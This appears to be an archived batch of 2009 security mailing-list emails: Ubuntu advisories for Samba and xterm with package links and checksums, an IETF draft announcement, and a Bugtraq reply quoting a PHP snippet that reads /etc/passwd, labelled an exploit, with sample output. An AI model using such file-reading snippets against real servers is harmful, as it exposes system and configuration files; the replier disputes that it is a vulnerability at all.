A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  samba                           2:3.2.3-1ubuntu3.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Gunter Höckel discovered that Samba with registry shares enabled did not
properly validate share names. An authenticated user could gain access to the
root filesystem by using an older version of smbclient and specifying an
empty string as a share name. This is only an issue if registry shares are
enabled on the server by setting "registry shares = yes", "include = registry",
or "config backend = registry", which is not the default.


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4.diff.gz
      Size/MD5:   228722 0f792a410505a9918479562ef16ccef4
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4.dsc
      Size/MD5:     1902 0bda9c946d4f940383ca31bb7ad3e3e8
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3.orig.tar.gz
      Size/MD5: 23704996 c1630a57ac0ec24bc364c6d11c93ec35

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.2.3-1ubuntu3.4_all.deb
      Size/MD5:  6261402 cdfa982dd0b9c04511734aba9cb98f43
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.2.3-1ubuntu3.4_all.deb
      Size/MD5:  7954776 d12c0694fa65e5f7162d5322f6765822

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:   638726 cc8150b5214fb77d9dfc019b2526cb7c
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1968610 adbbd514e01210d81004f1b9e674701e
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1370212 3192295c2170f5342235edcfd5a2044a
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:    89088 fd98b8c2d156a43597d81cb3c05ab3de
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  3815552 f36fd7dc29e504467a9e0c08f675dc48
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1993446 547e40f9cbc9e94908b9c21b54cf7c1f
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  5802386 e3e7c712a2784007497213bb0cf2d3d1
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  4908532 9188ed5c2e93fcfcc93ffb57aa33a4eb
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  7173498 6098ce448371e6cb7ba8a7d1acc82f39
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1529412 99c94bc3bc8b4ca40b70844062cb0158
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  1112728 6e7be6d81d4bb9645fe7049ad1098e24
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_amd64.deb
      Size/MD5:  3349950 4865e691932849cb5d554b27dc8203c6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:   574078 2547fa4ec3a2704e7600cfc1682e2678
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1844540 d766893ef3b88eefe3a5ff236d37a083
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1217736 fb4a6dcac85271bb5abd3102e246e908
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:    87620 145a90245f66ae82c94611c9a5ef90c6
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  3459480 f83b000101753604b107b969cbafaf38
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  2077500 e4d3bba7c3992d54a002a3de960da088
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  5161386 2f816bd0759b5395312b0260b2b1a830
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  4368978 e94a0a0065575763eb688719be55bb55
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  6402838 50306da79199442d648c653563d818e8
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1375964 bb03430c3f6d5f0b6a0ce5582fc4d355
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  1006606 f296946e86f49c6fb12b6a6fc74e5006
    http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_i386.deb
      Size/MD5:  2975328 c9581db640df6618b35bf0386817185e

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:   553748 4158873bb22c417e2817099582adef0c
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  1769190 f6dea760e2013d0902aea9bb366a7117
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  1160952 11776d3e92c48211b61d9aad4a83092a
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:    87062 ac2ead655b9e860e180778bdc3b601d8
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  3328740 fc6f54cab0701fc9c2f9f40712a322aa
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  2069796 5a757bef21769a0f99d571a9b16f0f41
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  4950004 4e7fd36bae326ccc396c16c023ad6789
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  4197392 34b7b42b2c5ab302afc86abca35cf459
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  6136884 b3f071c6be8fb4b0ae36b9a4f342328c
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  1317220 a2c2ba9a7251b9e66b7541012493a91d
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:   968410 72ced84400e6d8739710fcde6f4bafea
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_lpia.deb
      Size/MD5:  2855910 d92babc2dda651f130f15e16d887853c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:   606564 344aced9680f82f2144be4845d4f91a3
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1730412 8068336341c057b8d95be0601c204e3c
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1255134 86970b95de4ed88deb2d0497bc532fd6
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:    89038 cc4c8f2c4da9b4e8df3608c4a12547fb
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  3600282 9cd6002671370f4ae3d8a26ff72fb60f
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  2058546 1aecd0379eecc99b41fc6ce2a69309c7
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  5474936 044102518d3695912332b4eae9527b4b
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  4640066 96726a3b481e8e220d9e1ab27cd31a2f
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  6653622 f778f74e99accb34e8f385c5804b3d1e
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1417512 7a4323d2fe779cb63c7f1ad7387b1b83
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  1046216 75bd47fd42c6ae14db5573e8b176137e
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_powerpc.deb
      Size/MD5:  3123092 d2664b3080094bb24b530513c6359003

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/s/samba/libpam-smbpass_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:   592718 5debe4b94931b2c88f8fa475f5f77bc4
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient-dev_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  2008260 f498681d446a2ad9fc9f524fd077b4ae
    http://ports.ubuntu.com/pool/main/s/samba/libsmbclient_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  1216100 c01b1c22f857ed00cef34c6c8be07fb9
    http://ports.ubuntu.com/pool/main/s/samba/libwbclient0_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:    87638 08d33dc1f635ce0a7937c944a8009d49
    http://ports.ubuntu.com/pool/main/s/samba/samba-common_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  3501506 eb3aedcad68acbaa6624173801aebe91
    http://ports.ubuntu.com/pool/main/s/samba/samba-dbg_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  2007758 a3dfca08a50155f594c51ca801a258ad
    http://ports.ubuntu.com/pool/main/s/samba/samba-tools_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  5327954 1e480e57d3de6bfcce1a179d23a6d817
    http://ports.ubuntu.com/pool/main/s/samba/samba_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  4502118 ba2c5b5240d8de234da5e5e006924da4
    http://ports.ubuntu.com/pool/main/s/samba/smbclient_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  6448130 13a2ae5a41f1d7d026f109986927813b
    http://ports.ubuntu.com/pool/main/s/samba/smbfs_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  1371138 05fc1469ba4f74621b93b47a3205b1cb
    http://ports.ubuntu.com/pool/main/s/samba/swat_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  1019768 bf17ef67379f1b0c0ef76d74ffe3cd66
    http://ports.ubuntu.com/pool/main/s/samba/winbind_3.2.3-1ubuntu3.4_sparc.deb
      Size/MD5:  3029050 88018f0ef574839c0d956e62b5f873d6



--=-kQ5tEg1BNWkAxT8Ux/U8
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkliaqsACgkQLMAs/0C4zNqMFgCbBhsitSgMnwqDwxUHLJPj2coP
SagAn3EB44LfzgI2DvUssXMvbuGfzfci
=6N5y
-----END PGP SIGNATURE-----

--=-kQ5tEg1BNWkAxT8Ux/U8--

From - Tue Jan  6 11:40:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000565a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39073-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C1B47ED2EB
for <lists@securityspace.com>; Tue,  6 Jan 2009 11:32:55 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 696EF14371D; Tue,  6 Jan 2009 09:28:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26950 invoked from network); 6 Jan 2009 01:28:00 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:x-mailer:date:to
         :from:subject:mime-version:content-type;
        bh=mt66IL8wzLOuvSf0ZpYq/E+U30XFddwn08IU+RHF45k=;
        b=mrYpy9F39XhOyVRUqIBmX5Pe/Ul5uXXOhw0OnGHiOPscaiWSkMOPIvSoqfxPdPcqJQ
         dTLAnEqyDKCIilvbLibRLCyybLr1FT3dxuVgPl8zX7aoC2kmAjOG8yFZaYNUANfUj/IN
         Y8m4p2M3EsN4Rn6oWOIqTMLlK0yzTAIZx3aAwDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:x-mailer:date:to:from:subject:mime-version:content-type;
        b=ZnfldZWRGlnJpKx0eP/Dw1l6BoVHQVzCp59H8nXBInBTH2sfzdOtXUkM4GCwTdJwNL
         rQfaF8Lg+6fXnJyWtF9Y21Lpy9d5Hr1ROy0F0ucBRNIijiLCAU1RGCMNfZWAOghe8upR
         7N39BThafebMqnDdzdWn5mIGS4L+hh9aP6OdcMessage-ID: <4962b8d5.4403be0a.5d9c.3ce4@mx.google.com>
X-Mailer: QUALCOMM Windows Eudora Version 7.1.0.9
Date: Mon, 05 Jan 2009 22:43:03 -0300
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
From: Fernando Gont <fernando.gont@gmail.com>
Subject: [Suspected Spam]"Security Assessment of the Internet Protocol" & the IETF
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Brightmail-Tracker: AAAAAw0SGycNEd85DRIp8Q=Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Folks,

In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of
National Infrastructure) published the document "Security Assessment of the
Internet Protocol". The motivation of the aforementioned document is
explained in the Preface of the document itself. (The paper is available
at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf )

Once the paper was published by CPNI, I produced an IETF Internet-Draft
version of the same paper, with the intent of having the IETF publish
recommendations and/or update the specifications where necessary. This IETF
Internet-Draft is available at:
http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's
also available at the IETF I-D repository).

The Internet-Draft I published was aimed at the OPSEC WG. And the Working
Group is right now deciding whether to accept this document as a WG item.
This is certainly a critical step. Having the OPSEC WG accept this document
as a WG item would guarantee to some extent that the IETF will do something
about all this, and would also somehow set a precedent in updating the
specifications of core protocols and/or providing advice on security
aspects of them.

The call for consensus is available at:
http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can
voice your opinion on the relevant mailing-list sending an e-mail to
opsec@ietf.org . You don't need to subscribe to the mailing list to post a
message (although your message will be held for moderator approval before
it is distributed to the list members).

The deadline for posting your opinion is January 9th (next Friday).

Thanks so much!

Kind regards,
Fernando Gont




-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003) - not licensed for commercial 
use: www.pgp.com

wsBVAwUBSWK2AZbuqe/Qdv/xAQi1/AgAn+H3N3LHqbOxrl1HRXX0D2WULRfz7Ni8
VnV3pltrsSmRKXWvflgsrIhwdR0s2nzoFI7mh42Eks2EErKY596kj0CMhUqjQmZT
+Oqgaw0jz7XuGadeN6nErze8AOTA5HzIsK+hl93C/qGoyucW42XKNdeJZlXgOp2Q
8RAKGeogoPNAMw0btVNUj6HZP0dLaqM+2VuQSx9Vr1OIU01+WZ9z/BMQwjKgAl91
sixOPNXZeMT07GCqS03UWGGv+USyw3ksgc2n+X6IOv/HmOOAwduqFyGu6BzzEIDE
H86b4DAiye5f5qARrx5JNdsGEK11uWY/H1lFTOu6oP+GXZwkyfv5gg==m6sI
-----END PGP SIGNATURE-----


--
Fernando Gont
e-mail: fernando@gont.com.ar || fgont@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1




From - Tue Jan  6 11:50:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000565b
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39075-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C7837ED48B
for <lists@securityspace.com>; Tue,  6 Jan 2009 11:43:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 3F066143971; Tue,  6 Jan 2009 09:29:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3904 invoked from network); 6 Jan 2009 12:13:55 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type:Message-ID;
  b=N6VbtlhvbTZ+zYEb6I1qxifgEwX0evctk82hnUpxnYiyheShPdTDRtzBFOR/efsnYNAcOJ60plFtu9t4/3v/nYDN4Snp75BxYkODYa2ASWCF8MseMfny/efYT3ujkwm1hWi4NAh64xQjLgkrI6bOc8NRDUDPzTUAH9UnKtPDmq0=;
X-YMail-OSG: NimVTZAVM1lZAIlex0B8yPr4C0pYAcFQIbVARFqHJrsppo6bB0TRbg7MyxCECzi7jY9kVD4CLSfDSRZTO5bEszL0_6FmsnuBB3muwX4kU3ADr_OzlbNwlDN.xnC67iUR_.ZcMa_04.4iGd98wg_UxUmOQXBuXxWxDhw83zI9KvyXwbVERvklTmuUM6CgbPfWcUbYH6mYurzv5RGefuZ4utVxtiD0_5MxZrAnpRnZftOkeIfxCdQ1GXU-
X-Mailer: YahooMailWebService/0.7.260.1
Date: Tue, 6 Jan 2009 04:36:13 -0800 (PST)
From: Slack Traq <slacktraq@yahoo.com>
Reply-To: slacktraq@yahoo.com
Subject: Re: php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass&#8207;
To: bugtraq@securityfocus.com
In-Reply-To: <20090104193908.7771.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <499231.84297.qm@web52602.mail.re2.yahoo.com>
Status:   


There is no bug so no exploit can exist. File /etc/passwd is readable by any user (inside PHP with safe_mode disabled also) as it doesn't contain very sensitive information such as user passwords.

Double check what are you posting before actually doing it please.

Regards

--- On Sun, 1/4/09, l1un@hotmail.com <l1un@hotmail.com> wrote:

> From: l1un@hotmail.com <l1un@hotmail.com>
> Subject: php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass&#8207;
> To: bugtraq@securityfocus.com
> Date: Sunday, January 4, 2009, 11:39 AM
> Ahthoer:Super-Crystal
> www.arab4services.net
> safe_mode off (tested)
> <?
> show_source ('/etc/passwd');
> ?>
> Example exploit:
> <?
> show_source ('/home/user/public_html/config.php');
> ?>
> -----------------------------
> highlight_file()

>    <? 
> highlight_file ("/etc/passwd"); 
> ?> 
> exploit !!!  
> <code><span style="color: #000000">
> root:x:0:0:root:/root:/bin/bash<br
> />bin:x:1:1:bin:/bin:/sbin/nologin<br
> />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br
> />adm:x:3:4:adm:/var/adm:/sbin/nologin<br
> />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br
> />sync:x:5:0:sync:/sbin:/bin/sync<br
> />shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br
> />halt:x:7:0:halt:/sbin:/sbin/halt<br
> />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br
> />news:x:9:13:news:/etc/news:<br
> />uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br
> />operator:x:11:0:operator:/root:/sbin/nologin<br
> />games:x:12:100:games:/usr/games:/sbin/nologin<br
> />gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br
> />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br
> />nobody:x:99:99:Nobody:/:/sbin/nologin<br
> />dbus:x:81:81:System message bus:/:/sbin/nologin<br 
>  
> :)
>  
> greetz:php.net!

> th4nx securityfocus


      

From - Tue Jan  6 12:00:42 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000565c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39072-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D1FBDED4B8
for <lists@securityspace.com>; Tue,  6 Jan 2009 11:53:51 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CD51914370C; Tue,  6 Jan 2009 09:27:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26658 invoked from network); 6 Jan 2009 01:01:03 -0000
Date: Mon, 5 Jan 2009 17:23:08 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-703-1] xterm vulnerability
Message-ID: <20090106012308.GC7027@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="BXVAT5kNtrzKuDFl"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.63 on 10.2.0.1
Status:   


--BXVAT5kNtrzKuDFl
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-703-1           January 06, 2009
xterm vulnerability
CVE-2006-7236, CVE-2008-2383
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  xterm                           208-3.1ubuntu3.1

Ubuntu 7.10:
  xterm                           229-1ubuntu0.1

Ubuntu 8.04 LTS:
  xterm                           229-1ubuntu1.1

Ubuntu 8.10:
  xterm                           235-1ubuntu1.1

After a standard system upgrade you need to restart any running xterms to
effect the necessary changes.

Details follow:

Paul Szabo discovered that the DECRQSS escape sequences were not handled
correctly by xterm.  Additionally, window title operations were also not
safely handled.  If a user were tricked into viewing a specially crafted
series of characters while in xterm, a remote attacker could execute
arbitrary commands with user privileges. (CVE-2006-7236, CVE-2008-2382)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1.diff.gz
      Size/MD5:    62958 2178b13411ef6c0c84c455e7848c3b5a
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1.dsc
      Size/MD5:      800 6ff1855e882930be579eceb46223db59
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208.orig.tar.gz
      Size/MD5:   749755 a062d0b398918015d07c31ecdcc5111a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_amd64.deb
      Size/MD5:   416612 21f755ffe914eb143fb35f6be7d02ff7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_i386.deb
      Size/MD5:   396128 55b3a16962774230c48fb98ab90b6977

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_powerpc.deb
      Size/MD5:   408068 f7dab234c7df117de7e401cd966017a0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_208-3.1ubuntu3.1_sparc.deb
      Size/MD5:   403704 33cf8ee56acd8dd86540e72c26a5d54a

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1.diff.gz
      Size/MD5:    64026 93836a39864144c4f590202c85fb57c7
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1.dsc
      Size/MD5:      953 9b24ce999d1ca82a60f437f4c00ec847
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229.orig.tar.gz
      Size/MD5:   841542 f7b04a66dc401dc22f5ddb7f345be229

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_amd64.deb
      Size/MD5:   471288 599f1bfda25b6f178a37f94f775f155c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_i386.deb
      Size/MD5:   454306 6898963b2f11ecd8e950b68afe1d3c20

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xterm/xterm_229-1ubuntu0.1_lpia.deb
      Size/MD5:   454086 5bddec1c5e539884545e735fee6543f1

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_powerpc.deb
      Size/MD5:   470124 9c002fb71ddfd4d603b3789d234a1ae3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu0.1_sparc.deb
      Size/MD5:   465888 2df2203939f22f1ea2cfe8aef5f17f3c

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1.diff.gz
      Size/MD5:    64381 4b78020812d35038e91ab80718d76be4
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1.dsc
      Size/MD5:      953 46cf3fcc74956b9fe99ba89faab5ec7c
    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229.orig.tar.gz
      Size/MD5:   841542 f7b04a66dc401dc22f5ddb7f345be229

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xterm/xterm_229-1ubuntu1.1_amd64.deb
